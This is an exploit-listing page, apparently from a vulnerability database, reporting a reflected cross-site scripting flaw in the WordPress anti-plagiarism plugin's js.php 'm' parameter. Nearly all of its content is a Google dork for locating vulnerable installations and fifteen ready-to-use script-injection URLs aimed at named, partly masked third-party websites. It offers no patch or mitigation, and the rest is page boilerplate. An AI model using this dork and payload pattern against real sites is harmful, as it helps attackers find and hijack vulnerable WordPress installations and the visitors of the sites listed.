Wordpress anti-plagiarism Cross Site Scripting Vulnerability

2014.01.25

Credit: Ashiyane Digital Security Team

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: inurl:/wp-content/plugins/anti-plagiarism

######################
# Exploit Title : Wordpress anti-plagiarism Cross Site Scripting Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/anti-plagiarism/
# Google Dork : inurl:/wp-content/plugins/anti-plagiarism
# Download link : http://downloads.wordpress.org/plugin/anti-plagiarism.zip
# Date : 2014/01/23
# Tested on : Windows 8 , Linux
######################
http://teXamwayta.com/wp-content/plugins/anti-plagiarism/js.php?m=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://umida.rXu/wp-content/plugins/anti-plagiarism/js.php?m=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.encXantadordeperros.es/wp-content/plugins/anti-plagiarism/js.php?m=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://tweek.sXg/journal/wp-content/plugins/anti-plagiarism/js.php?m=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://sixtysix.Xsite90.net/wp-content/plugins/anti-plagiarism/js.php?m=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.XXdamladesen.com/wp-content/plugins/anti-plagiarism/js.php?m=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://blogX.gruffat.org/wp-content/plugins/anti-plagiarism/js.php?m=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://10X1recipe.com/wp-content/plugins/anti-plagiarism/js.php?m=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://hosting-graXtis.16mb.com/wp-content/plugins/anti-plagiarism/js.php?m=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.muXXjdatdede.com/wp-content/plugins/anti-plagiarism/js.php?m=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.flamenkXoizmir.com/wp-content/plugins/anti-plagiarism/js.php?m=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.edirneXtarihi.com/wp-content/plugins/anti-plagiarism/js.php?m=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.hetmXooisteuitjezelf.nl/wp-content/plugins/anti-plagiarism/js.php?m=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.hzoXmercamii.com/wp-content/plugins/anti-plagiarism/js.php?m=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://hosting-Xgratis.16mb.com/wp-content/plugins/anti-plagiarism/js.php?m=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#####################################
#
# Discovered by : Spoof
#
#####################################

References:

http://wordpress.org/plugins/anti-plagiarism/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Wordpress anti-plagiarism Cross Site Scripting Vulnerability

Dork: inurl:/wp-content/plugins/anti-plagiarism

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.